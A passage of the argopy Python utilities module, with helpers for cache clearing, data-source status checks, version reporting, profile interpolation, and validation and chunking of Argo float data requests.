collectionsAbc = collections.abc
except AttributeError:
collectionsAbc = collections
path2pkl = pkg_resources.resource_filename("argopy", "assets/")
def clear_cache(fs=None):
""" Delete argopy cache folder content """
if os.path.exists(OPTIONS["cachedir"]):
# shutil.rmtree(OPTIONS["cachedir"])
for filename in os.listdir(OPTIONS["cachedir"]):
file_path = os.path.join(OPTIONS["cachedir"], filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print("Failed to delete %s. Reason: %s" % (file_path, e))
if fs:
fs.clear_cache()
def load_dict(ptype):
if ptype == "profilers":
with open(os.path.join(path2pkl, "dict_profilers.pickle"), "rb") as f:
loaded_dict = pickle.load(f)
return loaded_dict
elif ptype == "institutions":
with open(os.path.join(path2pkl, "dict_institutions.pickle"), "rb") as f:
loaded_dict = pickle.load(f)
return loaded_dict
else:
raise ValueError("Invalid dictionary pickle file")
def mapp_dict(Adictionnary, Avalue):
if Avalue not in Adictionnary:
return "Unknown"
else:
return Adictionnary[Avalue]
def list_available_data_src():
""" List all available data sources """
sources = {}
try:
from .data_fetchers import erddap_data as Erddap_Fetchers
sources["erddap"] = Erddap_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the ERDDAP data fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
try:
from .data_fetchers import localftp_data as LocalFTP_Fetchers
sources["localftp"] = LocalFTP_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the local FTP data fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
try:
from .data_fetchers import argovis_data as ArgoVis_Fetchers
sources["argovis"] = ArgoVis_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the ArgoVis data fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
# return dict(sorted(sources.items()))
return sources
def list_available_index_src():
""" List all available index sources """
AVAILABLE_SOURCES = {}
try:
from .data_fetchers import erddap_index as Erddap_Fetchers
AVAILABLE_SOURCES["erddap"] = Erddap_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the ERDDAP index fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
try:
from .data_fetchers import localftp_index as LocalFTP_Fetchers
AVAILABLE_SOURCES["localftp"] = LocalFTP_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the local FTP index fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
return AVAILABLE_SOURCES
def list_standard_variables():
""" List of variables for standard users """
return [
"DATA_MODE",
"LATITUDE",
"LONGITUDE",
"POSITION_QC",
"DIRECTION",
"PLATFORM_NUMBER",
"CYCLE_NUMBER",
"PRES",
"TEMP",
"PSAL",
"PRES_QC",
"TEMP_QC",
"PSAL_QC",
"PRES_ADJUSTED",
"TEMP_ADJUSTED",
"PSAL_ADJUSTED",
"PRES_ADJUSTED_QC",
"TEMP_ADJUSTED_QC",
"PSAL_ADJUSTED_QC",
"PRES_ADJUSTED_ERROR",
"TEMP_ADJUSTED_ERROR",
"PSAL_ADJUSTED_ERROR",
"JULD",
"JULD_QC",
"TIME",
"TIME_QC",
"CONFIG_MISSION_NUMBER",
]
def list_multiprofile_file_variables():
""" List of variables in a netcdf multiprofile file.
This is for files created by GDAC under <DAC>/<WMO>/<WMO>_prof.nc
"""
return [
"CONFIG_MISSION_NUMBER",
"CYCLE_NUMBER",
"DATA_CENTRE",
"DATA_MODE",
"DATA_STATE_INDICATOR",
"DATA_TYPE",
"DATE_CREATION",
"DATE_UPDATE",
"DC_REFERENCE",
"DIRECTION",
"FIRMWARE_VERSION",
"FLOAT_SERIAL_NO",
"FORMAT_VERSION",
"HANDBOOK_VERSION",
"HISTORY_ACTION",
"HISTORY_DATE",
"HISTORY_INSTITUTION",
"HISTORY_PARAMETER",
"HISTORY_PREVIOUS_VALUE",
"HISTORY_QCTEST",
"HISTORY_REFERENCE",
"HISTORY_SOFTWARE",
"HISTORY_SOFTWARE_RELEASE",
"HISTORY_START_PRES",
"HISTORY_STEP",
"HISTORY_STOP_PRES",
"JULD",
"JULD_LOCATION",
"JULD_QC",
"LATITUDE",
"LONGITUDE",
"PARAMETER",
"PI_NAME",
"PLATFORM_NUMBER",
"PLATFORM_TYPE",
"POSITIONING_SYSTEM",
"POSITION_QC",
"PRES",
"PRES_ADJUSTED",
"PRES_ADJUSTED_ERROR",
"PRES_ADJUSTED_QC",
"PRES_QC",
"PROFILE_PRES_QC",
"PROFILE_PSAL_QC",
"PROFILE_TEMP_QC",
"PROJECT_NAME",
"PSAL",
"PSAL_ADJUSTED",
"PSAL_ADJUSTED_ERROR",
"PSAL_ADJUSTED_QC",
"PSAL_QC",
"REFERENCE_DATE_TIME",
"SCIENTIFIC_CALIB_COEFFICIENT",
"SCIENTIFIC_CALIB_COMMENT",
"SCIENTIFIC_CALIB_DATE",
"SCIENTIFIC_CALIB_EQUATION",
"STATION_PARAMETERS",
"TEMP",
"TEMP_ADJUSTED",
"TEMP_ADJUSTED_ERROR",
"TEMP_ADJUSTED_QC",
"TEMP_QC",
"VERTICAL_SAMPLING_SCHEME",
"WMO_INST_TYPE",
]
def check_localftp(path, errors: str = "ignore"):
""" Check if the path has the expected GDAC ftp structure
Check if the path is structured like:
.
└── dac
├── aoml
├── ...
├── coriolis
├── ...
├── meds
└── nmdis
Parameters
----------
path: str
Path name to check
errors: str
"ignore" or "raise" (or "warn"
Returns
-------
checked: boolean
True if at least one DAC folder is found under path/dac/<dac_name>
False otherwise
"""
dacs = [
"aoml",
"bodc",
"coriolis",
"csio",
"csiro",
"incois",
"jma",
"kma",
"kordi",
"meds",
"nmdis",
]
# Case 1:
check1 = (
os.path.isdir(path)
and os.path.isdir(os.path.join(path, "dac"))
and np.any([os.path.isdir(os.path.join(path, "dac", dac)) for dac in dacs])
)
if check1:
return True
elif errors == "raise":
# This was possible up to v0.1.3:
check2 = os.path.isdir(path) and np.any(
[os.path.isdir(os.path.join(path, dac)) for dac in dacs]
)
if check2:
raise FtpPathError(
"This path is no longer GDAC compliant for argopy.\n"
"Please make sure you point toward a path with a 'dac' folder:\n%s"
% path
)
else:
raise FtpPathError("This path is not GDAC compliant:\n%s" % path)
elif errors == "warn":
# This was possible up to v0.1.3:
check2 = os.path.isdir(path) and np.any(
[os.path.isdir(os.path.join(path, dac)) for dac in dacs]
)
if check2:
warnings.warn(
"This path is no longer GDAC compliant for argopy. This will raise an error in the future.\n"
"Please make sure you point toward a path with a 'dac' folder:\n%s"
% path
)
return False
else:
warnings.warn("This path is not GDAC compliant:\n%s" % path)
return False
else:
return False
def get_sys_info():
"Returns system information as a dict"
blob = []
# get full commit hash
commit = None
if os.path.isdir(".git") and os.path.isdir("argopy"):
try:
pipe = subprocess.Popen(
'git log --format="%H" -n 1'.split(" "),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
so, serr = pipe.communicate()
except Exception:
pass
else:
if pipe.returncode == 0:
commit = so
try:
commit = so.decode("utf-8")
except ValueError:
pass
commit = commit.strip().strip('"')
blob.append(("commit", commit))
try:
(sysname, nodename, release, version_, machine, processor) = platform.uname()
blob.extend(
[
("python", sys.version),
("python-bits", struct.calcsize("P") * 8),
("OS", "%s" % (sysname)),
("OS-release", "%s" % (release)),
("machine", "%s" % (machine)),
("processor", "%s" % (processor)),
("byteorder", "%s" % sys.byteorder),
("LC_ALL", "%s" % os.environ.get("LC_ALL", "None")),
("LANG", "%s" % os.environ.get("LANG", "None")),
("LOCALE", "%s.%s" % locale.getlocale()),
]
)
except Exception:
pass
return blob
def netcdf_and_hdf5_versions():
libhdf5_version = None
libnetcdf_version = None
try:
import netCDF4
libhdf5_version = netCDF4.__hdf5libversion__
libnetcdf_version = netCDF4.__netcdf4libversion__
except ImportError:
try:
import h5py
libhdf5_version = h5py.version.hdf5_version
except ImportError:
pass
return [("libhdf5", libhdf5_version), ("libnetcdf", libnetcdf_version)]
def show_versions(file=sys.stdout): # noqa: C901
""" Print the versions of argopy and its dependencies
Parameters
----------
file : file-like, optional
print to the given file-like object. Defaults to sys.stdout.
"""
sys_info = get_sys_info()
try:
sys_info.extend(netcdf_and_hdf5_versions())
except Exception as e:
print(f"Error collecting netcdf / hdf5 version: {e}")
deps = [
# (MODULE_NAME, f(mod) -> mod version)
# In REQUIREMENTS:
("argopy", lambda mod: mod.__version__),
("xarray", lambda mod: mod.__version__),
("scipy", lambda mod: mod.__version__),
("sklearn", lambda mod: mod.__version__),
("netCDF4", lambda mod: mod.__version__),
("dask", lambda mod: mod.__version__),
("toolz", lambda mod: mod.__version__),
("erddapy", lambda mod: mod.__version__),
("fsspec", lambda mod: mod.__version__),
("gsw", lambda mod: mod.__version__),
("aiohttp", lambda mod: mod.__version__),
#
("bottleneck", lambda mod: mod.__version__),
("cartopy", lambda mod: mod.__version__),
("cftime", lambda mod: mod.__version__),
("conda", lambda mod: mod.__version__),
("distributed", lambda mod: mod.__version__),
("IPython", lambda mod: mod.__version__),
("iris", lambda mod: mod.__version__),
("matplotlib", lambda mod: mod.__version__),
("nc_time_axis", lambda mod: mod.__version__),
("numpy", lambda mod: mod.__version__),
("pandas", lambda mod: mod.__version__),
("packaging", lambda mod: mod.__version__),
("pip", lambda mod: mod.__version__),
("PseudoNetCDF", lambda mod: mod.__version__),
("pytest", lambda mod: mod.__version__),
("seaborn", lambda mod: mod.__version__),
("setuptools", lambda mod: mod.__version__),
("sphinx", lambda mod: mod.__version__),
("zarr", lambda mod: mod.__version__),
]
deps_blob = list()
for (modname, ver_f) in deps:
try:
if modname in sys.modules:
mod = sys.modules[modname]
else:
mod = importlib.import_module(modname)
except Exception:
deps_blob.append((modname, None))
else:
try:
ver = ver_f(mod)
deps_blob.append((modname, ver))
except Exception:
deps_blob.append((modname, "installed"))
print("\nINSTALLED VERSIONS", file=file)
print("------------------", file=file)
for k, stat in sys_info:
print(f"{k}: {stat}", file=file)
print("", file=file)
for k, stat in deps_blob:
print(f"{k}: {stat}", file=file)
def show_options(file=sys.stdout): # noqa: C901
""" Print options of argopy
Parameters
----------
file : file-like, optional
print to the given file-like object. Defaults to sys.stdout.
"""
print("\nARGOPY OPTIONS", file=file)
print("--------------", file=file)
opts = copy.deepcopy(OPTIONS)
opts = dict(sorted(opts.items()))
for k, v in opts.items():
print(f"{k}: {v}", file=file)
def isconnected(host="https://www.ifremer.fr"):
""" check if we have a live internet connection
Parameters
----------
host: str
URL to use, 'https://www.ifremer.fr' by default
Returns
-------
bool
"""
if "http" in host or "ftp" in host:
try:
urllib.request.urlopen(host, timeout=1) # Python 3.x
return True
except Exception:
return False
else:
return os.path.exists(host)
def isAPIconnected(src="erddap", data=True):
""" Check if a source API is alive or not
The API is connected when it has a live URL or valid folder path.
Parameters
----------
src: str
The data or index source name, 'erddap' default
data: bool
If True check the data fetcher (default), if False, check the index fetcher
Returns
-------
bool
"""
if data:
list_src = list_available_data_src()
else:
list_src = list_available_index_src()
if src in list_src and getattr(
list_src[src], "api_server_check", None
):
if "localftp" in src:
# This is a special case because the source here is a local folder
result = check_localftp(OPTIONS["local_ftp"])
else:
result = isconnected(list_src[src].api_server_check)
return result
else:
raise InvalidFetcher
def erddap_ds_exists(ds: str = "ArgoFloats", erddap: str = 'https://www.ifremer.fr/erddap') -> bool:
""" Check if a dataset exists on a remote erddap server
return a bool
Parameter
---------
ds: str
Name of the erddap dataset to check (default: 'ArgoFloats')
erddap: str
Url of the erddap server (default: 'https://www.ifremer.fr/erddap')
Return
------
bool
"""
with httpstore(timeout=OPTIONS['api_timeout']).open("".join([erddap, "/info/index.json"])) as of:
erddap_index = json.load(of)
return ds in [row[-1] for row in erddap_index["table"]["rows"]]
def badge(label="label", message="message", color="green", insert=False):
""" Return or insert shield.io badge image
Use the shields.io service to create a badge image
https://img.shields.io/static/v1?label=<LABEL>&message=<MESSAGE>&color=<COLOR>
Parameters
----------
label: str
Left side badge text
message: str
Right side badge text
color: str
Right side background color
insert: bool
Return url to badge image (False, default) or directly insert the image with HTML (True)
Returns
-------
str or IPython.display.Image
"""
from IPython.display import Image
url = (
"https://img.shields.io/static/v1?style=flat-square&label={}&message={}&color={}"
).format
img = url(urllib.parse.quote(label), urllib.parse.quote(message), color)
if not insert:
return img
else:
return Image(url=img)
def fetch_status(stdout: str = "html", insert: bool = True):
""" Fetch and report web API status
Parameters
----------
stdout: str
Format of the results, default is 'html'. Otherwise a simple string.
insert: bool
Print or display results directly in stdout format.
Returns
-------
IPython.display.HTML or str
"""
results = {}
list_src = list_available_data_src()
for api, mod in list_src.items():
if getattr(mod, "api_server_check", None):
# status = isconnected(mod.api_server_check)
status = isAPIconnected(api)
if api=='localftp' and OPTIONS['local_ftp'] == '-':
message = "ok" if status else "path undefined !"
else:
# message = "up" if status else "down"
message = "ok" if status else "offline"
results[api] = {"value": status, "message": message}
if "IPython" in sys.modules and stdout == "html":
cols = []
for api in sorted(results.keys()):
color = "green" if results[api]["value"] else "orange"
if isconnected():
# img = badge("src='%s'" % api, message=results[api]['message'], color=color, insert=False)
# img = badge(label="argopy src", message="%s is %s" %
# (api, results[api]['message']), color=color, insert=False)
img = badge(
label="src %s is" % api,
message="%s" % results[api]["message"],
color=color,
insert=False,
)
html = ('<td><img src="{}"></td>').format(img)
else:
# html = "<th>src %s is:</th><td>%s</td>" % (api, results[api]['message'])
html = (
"<th><div>src %s is:</div></th><td><div style='color:%s;'>%s</div></td>"
% (api, color, results[api]["message"])
)
cols.append(html)
this_HTML = ("<table><tr>{}</tr></table>").format("".join(cols))
if insert:
from IPython.display import HTML, display
return display(HTML(this_HTML))
else:
return this_HTML
else:
rows = []
for api in sorted(results.keys()):
# rows.append("argopy src %s: %s" % (api, results[api]['message']))
rows.append("src %s is: %s" % (api, results[api]["message"]))
txt = "\n".join(rows)
if insert:
print(txt)
else:
return txt
class monitor_status:
""" Monitor data source status with a refresh rate """
def __init__(self, refresh=1):
import ipywidgets as widgets
self.refresh_rate = refresh
self.text = widgets.HTML(
value=fetch_status(stdout="html", insert=False),
placeholder="",
description="",
)
self.start()
def work(self):
while True:
time.sleep(self.refresh_rate)
self.text.value = fetch_status(stdout="html", insert=False)
def start(self):
from IPython.display import display
thread = threading.Thread(target=self.work)
display(self.text)
thread.start()
# def open_etopo1(box, res="l"):
# """ Download ETOPO for a box
#
# Parameters
# ----------
# box: [xmin, xmax, ymin, ymax]
#
# Returns
# -------
# xarray.Dataset
# """
# # This function is in utilities to anticipate usage outside of plotting, eg interpolation, grounding detection
# resx, resy = 0.1, 0.1
# if res == "h":
# resx, resy = 0.016, 0.016
#
# uri = (
# "https://gis.ngdc.noaa.gov/mapviewer-support/wcs-proxy/wcs.groovy?filename=etopo1.nc"
# "&request=getcoverage&version=1.0.0&service=wcs&coverage=etopo1&CRS=EPSG:4326&format=netcdf"
# "&resx={}&resy={}"
# "&bbox={}"
# ).format
# thisurl = uri(
# resx, resy, ",".join([str(b) for b in [box[0], box[2], box[1], box[3]]])
# )
# ds = httpstore(cache=True).open_dataset(thisurl)
# da = ds["Band1"].rename("topo")
# for a in ds.attrs:
# da.attrs[a] = ds.attrs[a]
# da.attrs["Data source"] = "https://maps.ngdc.noaa.gov/viewers/wcs-client/"
# da.attrs["URI"] = thisurl
# return da
#
# From xarrayutils : https://github.com/jbusecke/xarrayutils/blob/master/xarrayutils/vertical_coordinates.py
# Direct integration of those 2 functions to minimize dependencies and possibility of tuning them to our needs
#
def linear_interpolation_remap(
z, data, z_regridded, z_dim=None, z_regridded_dim="regridded", output_dim="remapped"
):
# interpolation called in xarray ufunc
def _regular_interp(x, y, target_values):
# remove all nans from input x and y
idx = np.logical_or(np.isnan(x), np.isnan(y))
x = x[~idx]
y = y[~idx]
# Need at least 5 points in the profile to interpolate, otherwise, return NaNs
if len(y) < 5:
interpolated = np.empty(len(target_values))
interpolated[:] = np.nan
else:
# replace nans in target_values with out of bound Values (just in case)
target_values = np.where(
~np.isnan(target_values), target_values, np.nanmax(x) + 1
)
# Interpolate with fill value parameter to extend min pressure toward 0
interpolated = interpolate.interp1d(
x, y, bounds_error=False, fill_value=(y[0], y[-1])
)(target_values)
return interpolated
# infer dim from input
if z_dim is None:
if len(z.dims) != 1:
raise RuntimeError("if z_dim is not specified, x must be a 1D array.")
dim = z.dims[0]
else:
dim = z_dim
# if dataset is passed drop all data_vars that dont contain dim
if isinstance(data, xr.Dataset):
raise ValueError("Dataset input is not supported yet")
# TODO: for a dataset input just apply the function for each appropriate array
if version.parse(xr.__version__) > version.parse("0.15.0"):
kwargs = dict(
input_core_dims=[[dim], [dim], [z_regridded_dim]],
output_core_dims=[[output_dim]],
vectorize=True,
dask="parallelized",
output_dtypes=[data.dtype],
dask_gufunc_kwargs={'output_sizes': {output_dim: len(z_regridded[z_regridded_dim])}},
)
else:
kwargs = dict(
input_core_dims=[[dim], [dim], [z_regridded_dim]],
output_core_dims=[[output_dim]],
vectorize=True,
dask="parallelized",
output_dtypes=[data.dtype],
output_sizes={output_dim: len(z_regridded[z_regridded_dim])},
)
remapped = xr.apply_ufunc(_regular_interp, z, data, z_regridded, **kwargs)
remapped.coords[output_dim] = z_regridded.rename(
{z_regridded_dim: output_dim}
).coords[output_dim]
return remapped
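# Illustrative sketch of using linear_interpolation_remap to put per-profile data on
# standard levels; the dataset variable and dimension names (ds, PRES, TEMP, N_LEVELS)
# are assumptions for the example, not part of this module:
# >>> std_levels = xr.DataArray(np.arange(0., 2000., 10.), dims=['Z_LEVELS'])
# >>> temp_std = linear_interpolation_remap(ds['PRES'], ds['TEMP'], std_levels,
# ...                                       z_dim='N_LEVELS', z_regridded_dim='Z_LEVELS')
# >>> temp_std  # DataArray where the vertical axis is replaced by the 'remapped' dimension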
class Chunker:
""" To chunk fetcher requests """
# Default maximum chunks size for all possible request parameters
    default_chunksize = {
        "box": {
            "lon": 20,       # degrees
            "lat": 20,       # degrees
            "dpt": 500,      # meters/db
            "time": 3 * 30,  # days
        },
        "wmo": {
            "wmo": 5,    # nb of floats
            "cyc": 100,  # nb of cycles
        },
    }
def __init__(self, request: dict, chunks: str = "auto", chunksize: dict = {}):
""" Create a request Chunker
Allow to easily split an access point request into chunks
Parameters
----------
request: dict
Access point request to be chunked. One of the following:
- {'box': [lon_min, lon_max, lat_min, lat_max, dpt_min, dpt_max, time_min, time_max]}
- {'box': [lon_min, lon_max, lat_min, lat_max, dpt_min, dpt_max]}
- {'wmo': [wmo1, wmo2, ...], 'cyc': [0,1, ...]}
chunks: 'auto' or dict
Dictionary with request access point as keys and number of chunks to create as values.
Eg: {'wmo':10} will create a maximum of 10 chunks along WMOs.
chunksize: dict, optional
Dictionary with request access point as keys and chunk size as values (used as maximum values in
'auto' chunking).
Eg: {'wmo': 5} will create chunks with as many as 5 WMOs each.
"""
self.request = request
if "box" in self.request:
is_box(self.request["box"])
if len(self.request["box"]) == 8:
self.this_chunker = self._chunker_box4d
elif len(self.request["box"]) == 6:
self.this_chunker = self._chunker_box3d
elif "wmo" in self.request:
self.this_chunker = self._chunker_wmo
else:
raise InvalidFetcherAccessPoint(
"'%s' not valid access point" % ",".join(self.request.keys())
)
default = self.default_chunksize[[k for k in self.request.keys()][0]]
if len(chunksize) == 0: # chunksize = {}
chunksize = default
if not isinstance(chunksize, collectionsAbc.Mapping):
raise ValueError("chunksize must be mappable")
else: # merge with default:
chunksize = {**default, **chunksize}
self.chunksize = collections.OrderedDict(sorted(chunksize.items()))
default = {k: "auto" for k in self.chunksize.keys()}
if chunks == "auto": # auto for all
chunks = default
elif len(chunks) == 0: # chunks = {}, i.e. chunk=1 for all
chunks = {k: 1 for k in self.request}
if not isinstance(chunks, collectionsAbc.Mapping):
raise ValueError("chunks must be 'auto' or mappable")
chunks = {**default, **chunks}
self.chunks = collections.OrderedDict(sorted(chunks.items()))
def _split(self, lst, n=1):
"""Yield successive n-sized chunks from lst"""
for i in range(0, len(lst), n):
yield lst[i: i + n]
def _split_list_bychunknb(self, lst, n=1):
"""Split list in n-imposed chunks of similar size
        The last chunk may contain more or fewer elements than the others, depending on the size of the list.
"""
res = []
siz = int(np.floor_divide(len(lst), n))
for i in self._split(lst, siz):
res.append(i)
if len(res) > n:
res[n - 1::] = [reduce(lambda i, j: i + j, res[n - 1::])]
return res
def _split_list_bychunksize(self, lst, max_size=1):
"""Split list in chunks of imposed size
        The last chunk may contain more or fewer elements than the others, depending on the size of the list.
"""
res = []
for i in self._split(lst, max_size):
res.append(i)
return res
def _split_box(self, large_box, n=1, d="x"): # noqa: C901
"""Split a box domain in one direction in n-imposed equal chunks """
if d == "x":
i_left, i_right = 0, 1
if d == "y":
i_left, i_right = 2, 3
if d == "z":
i_left, i_right = 4, 5
if d == "t":
i_left, i_right = 6, 7
if n == 1:
return [large_box]
boxes = []
if d in ["x", "y", "z"]:
n += 1 # Required because we split in linspace
bins = np.linspace(large_box[i_left], large_box[i_right], n)
for ii, left in enumerate(bins):
if ii < len(bins) - 1:
right = bins[ii + 1]
this_box = large_box.copy()
this_box[i_left] = left
this_box[i_right] = right
boxes.append(this_box)
elif "t" in d:
dates = pd.to_datetime(large_box[i_left: i_right + 1])
date_bounds = [
d.strftime("%Y%m%d%H%M%S")
for d in pd.date_range(dates[0], dates[1], periods=n + 1)
]
for i1, i2 in zip(np.arange(0, n), np.arange(1, n + 1)):
left, right = date_bounds[i1], date_bounds[i2]
this_box = large_box.copy()
this_box[i_left] = left
this_box[i_right] = right
boxes.append(this_box)
return boxes
def _split_this_4Dbox(self, box, nx=1, ny=1, nz=1, nt=1):
box_list = []
split_x = self._split_box(box, n=nx, d="x")
for bx in split_x:
split_y = self._split_box(bx, n=ny, d="y")
for bxy in split_y:
split_z = self._split_box(bxy, n=nz, d="z")
for bxyz in split_z:
split_t = self._split_box(bxyz, n=nt, d="t")
for bxyzt in split_t:
box_list.append(bxyzt)
return box_list
def _split_this_3Dbox(self, box, nx=1, ny=1, nz=1):
box_list = []
split_x = self._split_box(box, n=nx, d="x")
for bx in split_x:
split_y = self._split_box(bx, n=ny, d="y")
for bxy in split_y:
split_z = self._split_box(bxy, n=nz, d="z")
for bxyz in split_z:
box_list.append(bxyz)
return box_list
def _chunker_box4d(self, request, chunks, chunks_maxsize): # noqa: C901
BOX = request["box"]
n_chunks = chunks
for axis, n in n_chunks.items():
if n == "auto":
if axis == "lon":
Lx = BOX[1] - BOX[0]
if Lx > chunks_maxsize["lon"]: # Max box size in longitude
n_chunks["lon"] = int(
np.ceil(np.divide(Lx, chunks_maxsize["lon"]))
)
else:
n_chunks["lon"] = 1
if axis == "lat":
Ly = BOX[3] - BOX[2]
if Ly > chunks_maxsize["lat"]: # Max box size in latitude
n_chunks["lat"] = int(
np.ceil(np.divide(Ly, chunks_maxsize["lat"]))
)
else:
n_chunks["lat"] = 1
if axis == "dpt":
Lz = BOX[5] - BOX[4]
if Lz > chunks_maxsize["dpt"]: # Max box size in depth
n_chunks["dpt"] = int(
np.ceil(np.divide(Lz, chunks_maxsize["dpt"]))
)
else:
n_chunks["dpt"] = 1
if axis == "time":
Lt = np.timedelta64(
pd.to_datetime(BOX[7]) - pd.to_datetime(BOX[6]), "D"
)
MaxLen = np.timedelta64(chunks_maxsize["time"], "D")
if Lt > MaxLen: # Max box size in time
n_chunks["time"] = int(np.ceil(np.divide(Lt, MaxLen)))
else:
n_chunks["time"] = 1
boxes = self._split_this_4Dbox(
BOX,
nx=n_chunks["lon"],
ny=n_chunks["lat"],
nz=n_chunks["dpt"],
nt=n_chunks["time"],
)
return {"chunks": sorted(n_chunks), "values": boxes}
def _chunker_box3d(self, request, chunks, chunks_maxsize):
BOX = request["box"]
n_chunks = chunks
for axis, n in n_chunks.items():
if n == "auto":
if axis == "lon":
Lx = BOX[1] - BOX[0]
if Lx > chunks_maxsize["lon"]: # Max box size in longitude
n_chunks["lon"] = int(
np.floor_divide(Lx, chunks_maxsize["lon"])
)
else:
n_chunks["lon"] = 1
if axis == "lat":
Ly = BOX[3] - BOX[2]
if Ly > chunks_maxsize["lat"]: # Max box size in latitude
n_chunks["lat"] = int(
np.floor_divide(Ly, chunks_maxsize["lat"])
)
else:
n_chunks["lat"] = 1
if axis == "dpt":
Lz = BOX[5] - BOX[4]
if Lz > chunks_maxsize["dpt"]: # Max box size in depth
n_chunks["dpt"] = int(
np.floor_divide(Lz, chunks_maxsize["dpt"])
)
else:
n_chunks["dpt"] = 1
# if axis == 'time':
# Lt = np.timedelta64(pd.to_datetime(BOX[5]) - pd.to_datetime(BOX[4]), 'D')
# MaxLen = np.timedelta64(chunks_maxsize['time'], 'D')
# if Lt > MaxLen: # Max box size in time
# n_chunks['time'] = int(np.floor_divide(Lt, MaxLen))
# else:
# n_chunks['time'] = 1
boxes = self._split_this_3Dbox(
BOX, nx=n_chunks["lon"], ny=n_chunks["lat"], nz=n_chunks["dpt"]
)
return {"chunks": sorted(n_chunks), "values": boxes}
def _chunker_wmo(self, request, chunks, chunks_maxsize):
WMO = request["wmo"]
n_chunks = chunks
if n_chunks["wmo"] == "auto":
wmo_grps = self._split_list_bychunksize(WMO, max_size=chunks_maxsize["wmo"])
else:
n = np.min([n_chunks["wmo"], len(WMO)])
wmo_grps = self._split_list_bychunknb(WMO, n=n)
n_chunks["wmo"] = len(wmo_grps)
return {"chunks": sorted(n_chunks), "values": wmo_grps}
def fit_transform(self):
""" Chunk a fetcher request
Returns
-------
list
"""
self._results = self.this_chunker(self.request, self.chunks, self.chunksize)
# self.chunks = self._results['chunks']
return self._results["values"]
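# Illustrative sketch of chunking a WMO access point request; the WMO numbers are
# placeholders used only for the example:
# >>> C = Chunker({'wmo': [6901929, 6901930, 6901931, 6901932, 6901933]}, chunks={'wmo': 2})
# >>> C.fit_transform()
# [[6901929, 6901930], [6901931, 6901932, 6901933]]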
def format_oneline(s, max_width=65):
""" Return a string formatted for a line print """
if len(s) > max_width:
padding = " ... "
n = (max_width - len(padding)) // 2
q = (max_width - len(padding)) % 2
if q == 0:
return "".join([s[0:n], padding, s[-n:]])
else:
return "".join([s[0: n + 1], padding, s[-n:]])
else:
return s
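# Example (sketch): long strings are collapsed around a ' ... ' padding.
# >>> format_oneline("x" * 100, max_width=15)
# 'xxxxx ... xxxxx'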
def is_indexbox(box: list, errors="raise"):
""" Check if this array matches a 2d or 3d index box definition
box = [lon_min, lon_max, lat_min, lat_max]
or:
box = [lon_min, lon_max, lat_min, lat_max, datim_min, datim_max]
Parameters
----------
box: list
errors: 'raise'
Returns
-------
bool
"""
tests = {}
# Formats:
tests["index box must be a list"] = lambda b: isinstance(b, list)
tests["index box must be a list with 4 or 6 elements"] = lambda b: len(b) in [4, 6]
error = None
for msg, test in tests.items():
if not test(box):
error = msg
break
if error and errors == "raise":
raise ValueError("%s: %s" % (box, error))
elif error:
return False
else:
# Insert pressure bounds and use full box validator:
tmp_box = box.copy()
tmp_box.insert(4, 0.)
tmp_box.insert(5, 10000.)
return is_box(tmp_box, errors=errors)
def is_box(box: list, errors="raise"):
""" Check if this array matches a 3d or 4d data box definition
box = [lon_min, lon_max, lat_min, lat_max, pres_min, pres_max]
or:
box = [lon_min, lon_max, lat_min, lat_max, pres_min, pres_max, datim_min, datim_max]
Parameters
----------
box: list
errors: 'raise'
Returns
-------
bool
"""
def is_dateconvertible(d):
try:
pd.to_datetime(d)
isit = True
except Exception:
isit = False
return isit
tests = {}
# print(box)
# Formats:
tests["box must be a list"] = lambda b: isinstance(b, list)
tests["box must be a list with 6 or 8 elements"] = lambda b: len(b) in [6, 8]
# Types:
tests["lon_min must be numeric"] = lambda b: (
isinstance(b[0], int) or isinstance(b[0], (np.floating, float))
)
tests["lon_max must be numeric"] = lambda b: (
isinstance(b[1], int) or isinstance(b[1], (np.floating, float))
)
tests["lat_min must be numeric"] = lambda b: (
isinstance(b[2], int) or isinstance(b[2], (np.floating, float))
)
tests["lat_max must be numeric"] = lambda b: (
isinstance(b[3], int) or isinstance(b[3], (np.floating, float))
)
tests["pres_min must be numeric"] = lambda b: (
isinstance(b[4], int) or isinstance(b[4], (np.floating, float))
)
tests["pres_max must be numeric"] = lambda b: (
isinstance(b[5], int) or isinstance(b[5], (np.floating, float))
)
if len(box) == 8:
tests[
"datetim_min must be a string convertible to a Pandas datetime"
] = lambda b: isinstance(b[-2], str) and is_dateconvertible(b[-2])
tests[
"datetim_max must be a string convertible to a Pandas datetime"
] = lambda b: isinstance(b[-1], str) and is_dateconvertible(b[-1])
# Ranges:
tests["lon_min must be in [-180;180] or [0;360]"] = (
lambda b: b[0] >= -180.0 and b[0] <= 360.0
)
tests["lon_max must be in [-180;180] or [0;360]"] = (
lambda b: b[1] >= -180.0 and b[1] <= 360.0
)
tests["lat_min must be in [-90;90]"] = lambda b: b[2] >= -90.0 and b[2] <= 90
tests["lat_max must be in [-90;90]"] = lambda b: b[3] >= -90.0 and b[3] <= 90.0
tests["pres_min must be in [0;10000]"] = lambda b: b[4] >= 0 and b[4] <= 10000
tests["pres_max must be in [0;10000]"] = lambda b: b[5] >= 0 and b[5] <= 10000
# Orders:
tests["lon_max must be larger than lon_min"] = lambda b: b[0] < b[1]
tests["lat_max must be larger than lat_min"] = lambda b: b[2] < b[3]
tests["pres_max must be larger than pres_min"] = lambda b: b[4] < b[5]
if len(box) == 8:
tests["datetim_max must come after datetim_min"] = lambda b: pd.to_datetime(
b[-2]
) < pd.to_datetime(b[-1])
error = None
for msg, test in tests.items():
if not test(box):
error = msg
break
if error and errors == "raise":
raise ValueError("%s: %s" % (box, error))
elif error:
return False
else:
return True
